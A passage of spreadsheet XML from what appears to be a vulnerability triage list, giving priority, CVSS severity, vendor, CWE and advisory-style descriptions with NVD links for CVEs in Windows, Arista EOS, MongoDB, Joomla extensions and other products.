      <c r="Q806" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R806" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="D807" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F807" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G807" s="5" t="inlineStr"/>
      <c r="H807" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I807" s="5" t="inlineStr"/>
      <c r="J807" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K807"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807" s="5" t="inlineStr"/>
      <c r="M807" s="5" t="inlineStr"/>
      <c r="N807" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O807" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P807" s="5" t="inlineStr"/>
      <c r="Q807" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R807" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="D808" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F808" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G808" s="5" t="inlineStr"/>
      <c r="H808" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I808" s="5" t="inlineStr"/>
      <c r="J808" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K808"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808" s="5" t="inlineStr"/>
      <c r="M808" s="5" t="inlineStr"/>
      <c r="N808" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O808" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P808" s="5" t="inlineStr"/>
      <c r="Q808" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R808" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="D809" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F809" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G809" s="5" t="inlineStr"/>
      <c r="H809" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I809" s="5" t="inlineStr"/>
      <c r="J809" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K809"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809" s="5" t="inlineStr"/>
      <c r="M809" s="5" t="inlineStr"/>
      <c r="N809" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O809" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P809" s="5" t="inlineStr"/>
      <c r="Q809" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R809" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="D810" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F810" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I810" s="5" t="inlineStr"/>
      <c r="J810" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K810" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L810" s="5" t="inlineStr"/>
      <c r="M810" s="5" t="inlineStr"/>
      <c r="N810" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O810" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P810" s="5" t="inlineStr"/>
      <c r="Q810" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R810" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73435</t>
        </is>
      </c>
      <c r="D811" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F811" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G811" s="5" t="inlineStr"/>
      <c r="H811" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I811" s="5" t="inlineStr"/>
      <c r="J811" s="5" t="inlineStr"/>
      <c r="K811" s="5" t="inlineStr"/>
      <c r="L811" s="5" t="inlineStr"/>
      <c r="M811" s="5" t="inlineStr"/>
      <c r="N811" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O811" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P811" s="5" t="inlineStr"/>
      <c r="Q811" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R811" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with Open Shortest Path First version 2 (OSPFv2) configured, a specially crafted OSPFv2 packet from an unauthenticated attacker on the same broadcast segment, with OSPFv2 authentication configured can cause adjacency flapping and packet loss. The disruption can affect routing across the broader OSPF domain.</t>
        </is>
      </c>
      <c r="S811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73435</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73438</t>
        </is>
      </c>
      <c r="D812" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F812" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I812" s="5" t="inlineStr"/>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr"/>
      <c r="L812" s="5" t="inlineStr"/>
      <c r="M812" s="5" t="inlineStr"/>
      <c r="N812" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O812" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P812" s="5" t="inlineStr"/>
      <c r="Q812" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R812" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with Open Shortest Path First version 3 (OSPFv3) configured, an unauthenticated attacker on the same OSPFv3 broadcast domain can send a specially crafted set of packets that can cause the Ospf3 agent to restart unexpectedly. The crash results in the loss of all OSPFv3 adjacencies on the affected device and may disrupt routing across the broader OSPF domain until the agent recovers.
This issue was reported externally by Dravanet Inc., and Arista is not aware of any malicious exploitation of this vulnerability in customer networks.</t>
        </is>
      </c>
      <c r="S812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73438</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73446</t>
        </is>
      </c>
      <c r="D813" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F813" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G813" s="5" t="inlineStr"/>
      <c r="H813" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I813" s="5" t="inlineStr"/>
      <c r="J813" s="5" t="inlineStr"/>
      <c r="K813" s="5" t="inlineStr"/>
      <c r="L813" s="5" t="inlineStr"/>
      <c r="M813" s="5" t="inlineStr"/>
      <c r="N813" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O813" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P813" s="5" t="inlineStr"/>
      <c r="Q813" s="5" t="inlineStr">
        <is>
          <t>CWE-696</t>
        </is>
      </c>
      <c r="R813" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with IS-IS configured on a broadcast interface, an unauthenticated attacker can send a crafted IS-IS Hello Protocol Data Unit (PDU) that causes the device to tear down an established IS-IS adjacency. This may result in traffic disruption and loss of IP reachability for prefixes advertised through that adjacency.</t>
        </is>
      </c>
      <c r="S813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73446</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73450</t>
        </is>
      </c>
      <c r="D814" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F814" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I814" s="5" t="inlineStr"/>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr"/>
      <c r="L814" s="5" t="inlineStr"/>
      <c r="M814" s="5" t="inlineStr"/>
      <c r="N814" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O814" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P814" s="5" t="inlineStr"/>
      <c r="Q814" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R814" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with MLAG Dual Primary Detection configured, an unauthenticated attacker with access to the Dual Primary Detection network segment can send specially crafted packets to interfere with the dual-primary state. If the MLAG primary switch fails while these packets are present, the secondary switch incorrectly concludes it is in a dual-primary condition and err-disables its interfaces, leading to a traffic interruption.</t>
        </is>
      </c>
      <c r="S814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73450</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73459</t>
        </is>
      </c>
      <c r="D815" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F815" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I815" s="5" t="inlineStr"/>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr"/>
      <c r="L815" s="5" t="inlineStr"/>
      <c r="M815" s="5" t="inlineStr"/>
      <c r="N815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O815" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P815" s="5" t="inlineStr"/>
      <c r="Q815" s="5" t="inlineStr">
        <is>
          <t>CWE-354</t>
        </is>
      </c>
      <c r="R815" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with IS-IS configured, an unauthenticated attacker who can inject a specially crafted IS-IS LSP PDU can cause the legitimate LSP to be unexpectedly purged from the IS-IS link-state database. This may result in traffic loss.</t>
        </is>
      </c>
      <c r="S815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73459</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73460</t>
        </is>
      </c>
      <c r="D816" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F816" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G816" s="5" t="inlineStr"/>
      <c r="H816" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I816" s="5" t="inlineStr"/>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr"/>
      <c r="L816" s="5" t="inlineStr"/>
      <c r="M816" s="5" t="inlineStr"/>
      <c r="N816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O816" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P816" s="5" t="inlineStr"/>
      <c r="Q816" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R816" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with IS-IS graceful restart enabled, an unauthenticated attacker who can inject a malformed IS-IS LSP PDU packet can cause the IS-IS graceful restart procedure to terminate prematurely. This may result in traffic loss following a restart event.</t>
        </is>
      </c>
      <c r="S816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73460</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77407</t>
        </is>
      </c>
      <c r="D817" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F817" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G817" s="5" t="inlineStr"/>
      <c r="H817" s="5" t="inlineStr"/>
      <c r="I817" s="5" t="inlineStr"/>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr"/>
      <c r="L817" s="5" t="inlineStr"/>
      <c r="M817" s="5" t="inlineStr"/>
      <c r="N817" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O817" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P817" s="5" t="inlineStr"/>
      <c r="Q817" s="5" t="inlineStr">
        <is>
          <t>CWE-316</t>
        </is>
      </c>
      <c r="R817" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, PlainAuth values defined in auth.go retain passwords as exported plaintext fields in Connection.Config.SASL after a successful PLAIN authentication handshake. The Connection.openComplete method in connection.go does not clear those values. Code with access to the Connection object, including reflective loggers, application performance monitoring agents, debugging utilities, and panic handlers, can traverse the configuration and expose the credentials to logs or state captures. The credential remains available for the lifetime of the connection instead of being cleared after authentication. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77407</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="D818" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F818" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I818" s="5" t="inlineStr"/>
      <c r="J818" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K818"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818" s="5" t="inlineStr"/>
      <c r="M818" s="5" t="inlineStr"/>
      <c r="N818" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O818" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P818" s="5" t="inlineStr"/>
      <c r="Q818" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R818" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="D819" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F819" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I819" s="5" t="inlineStr"/>
      <c r="J819" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K819" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t>
        </is>
      </c>
      <c r="L819" s="5" t="inlineStr"/>
      <c r="M819" s="5" t="inlineStr"/>
      <c r="N819" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O819" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P819" s="5" t="inlineStr"/>
      <c r="Q819" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R819" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81564</t>
        </is>
      </c>
      <c r="D820" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F820" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I820" s="5" t="inlineStr"/>
      <c r="J820" s="5" t="inlineStr"/>
      <c r="K820" s="5" t="inlineStr"/>
      <c r="L820" s="5" t="inlineStr"/>
      <c r="M820" s="5" t="inlineStr"/>
      <c r="N820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O820" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P820" s="5" t="inlineStr"/>
      <c r="Q820" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R820" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Missing Directory Confinement in Media Rename Allowing Arbitrary File Rename in SP Page Builder (Free and Pro) 4.0.0 - 6.9.0 - The media rename task applied neither of the directory boundary checks used by the folder operations in the same controller, and its validation guard required only that either a media record exist for the supplied identifier or that the supplied path be present in #__spmedia, rather than both. The identifier and the path were consequently never checked against one another, so any valid media identifier could be paired with an unrelated filesystem path, and the STR input filter left traversal sequences intact. An attacker could rename files elsewhere in the installation, including renaming configuration.php to take the site offline.</t>
        </is>
      </c>
      <c r="S820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81564</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="D821" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F821" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G821" s="5" t="inlineStr"/>
      <c r="H821" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I821" s="5" t="inlineStr"/>
      <c r="J821" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K821" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L821" s="5" t="inlineStr"/>
      <c r="M821" s="5" t="inlineStr"/>
      <c r="N821" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O821" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P821" s="5" t="inlineStr"/>
      <c r="Q821" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R821" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with elevated internal privileges to bypass a disabled feature gate in the applyOps command by specifying an internal replication mode value that was not intended to be client-selectable. This bypass enables execution of container operations that are disabled by default in production configurations, allowing direct storage-engine writes to arbitrary internal storage tables. The authorization check for these operations validates only the operation's namespace, not the actual storage target, enabling writes to unrelated internal metadata or other collections' data.</t>
        </is>
      </c>
      <c r="S821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85628</t>
        </is>
      </c>
      <c r="D822" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F822" s="5" t="inlineStr">
        <is>
          <t>539080bd-5750-4cce-b30b-eed9a4ef6dcc</t>
        </is>
      </c>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I822" s="5" t="inlineStr"/>
      <c r="J822" s="5" t="inlineStr"/>
      <c r="K822" s="5" t="inlineStr"/>
      <c r="L822" s="5" t="inlineStr"/>
      <c r="M822" s="5" t="inlineStr"/>
      <c r="N822" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O822" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P822" s="5" t="inlineStr"/>
      <c r="Q822" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R822" s="5" t="inlineStr">
        <is>
          <t>Transmission of the home Wi-Fi credentials without encryption during the pairing process between the DuoxMe application and VEO and VEO-XS Wi-Fi monitors, in versions prior to 4.3.4 of the application and 01.50.001 of the monitor firmware, allows an attacker on the Wi-Fi Direct network to intercept the network password.</t>
        </is>
      </c>
      <c r="S822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85628</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87088</t>
        </is>
      </c>
      <c r="D823" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F823" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I823" s="5" t="inlineStr"/>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr">
        <is>
          <t>tanium:enforce</t>
        </is>
      </c>
      <c r="L823" s="5" t="inlineStr"/>
      <c r="M823" s="5" t="inlineStr"/>
      <c r="N823" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
